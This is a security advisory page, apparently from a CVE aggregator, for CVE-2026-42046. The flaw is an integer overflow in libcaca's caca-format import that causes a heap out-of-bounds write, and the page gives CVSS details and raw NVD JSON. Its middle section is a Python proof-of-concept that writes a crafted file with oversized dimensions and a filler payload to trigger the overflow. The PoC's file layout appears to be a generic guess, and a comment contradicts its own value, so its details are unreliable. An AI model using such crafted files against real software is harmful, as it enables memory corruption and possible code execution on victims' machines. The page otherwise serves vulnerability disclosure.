Security Vulnerability Report
中文
CVE-2026-42046 CVSS 7.8 HIGH

CVE-2026-42046

Published: 2026-05-11 22:22:11
Last Modified: 2026-05-11 22:22:11
Source: [email protected]

Description

libcaca is a colour ASCII art library. In 0.99.beta20 and earlier, an integer overflow vulnerability in libcaca's canvas import functionality allows an attacker to cause a controlled heap out-of-bounds write (heap overflow) by supplying a crafted file in the "caca" format. Depending on the build configuration and memory allocator, this may lead to memory corruption or remote code execution. This is the same vulnerability as CVE-2021-3410 but the fix at that time was not fully correct. Commit fb77acff9ba6bb01d53940da34fb10f20b156a23 fixes this vulnerability.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

libcaca <= 0.99.beta20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # PoC for CVE-2026-42046: Integer Overflow in libcaca # This script generates a crafted 'caca' file that triggers an integer overflow # leading to a heap out-of-bounds write. def create_exploit_file(filename): with open(filename, 'wb') as f: # Write file header (Magic bytes for caca format) f.write(b'CACA') # Set dimensions to trigger integer overflow during size calculation # Width * Height should overflow to a small value width = 0x10000000 # Large value height = 0x10 # Large value # Write dimensions (assuming 32-bit integers for this example) f.write(struct.pack('<I', width)) f.write(struct.pack('<I', height)) # Write payload data # The parser allocates a small buffer due to overflow but copies this large payload payload = b'A' * 0x1000 f.write(payload) print(f"[+] Exploit file generated: {filename}") print(f"[*] Usage: Open this file with an application using libcaca <= 0.99.beta20") if __name__ == "__main__": create_exploit_file("cve_2026_42046_exploit.caca")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42046", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.130", "lastModified": "2026-05-11T22:22:11.130", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "libcaca is a colour ASCII art library. In 0.99.beta20 and earlier, an integer overflow vulnerability in libcaca's canvas import functionality allows an attacker to cause a controlled heap out-of-bounds write (heap overflow) by supplying a crafted file in the \"caca\" format. Depending on the build configuration and memory allocator, this may lead to memory corruption or remote code execution. This is the same vulnerability as CVE-2021-3410 but the fix at that time was not fully correct. Commit fb77acff9ba6bb01d53940da34fb10f20b156a23 fixes this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/cacalabs/libcaca/commit/fb77acff9ba6bb01d53940da34fb10f20b156a23", "source": "[email protected]"}, {"url": "https://github.com/cacalabs/libcaca/issues/86", "source": "[email protected]"}, {"url": "https://github.com/cacalabs/libcaca/security/advisories/GHSA-4vvg-vrqv-m56w", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.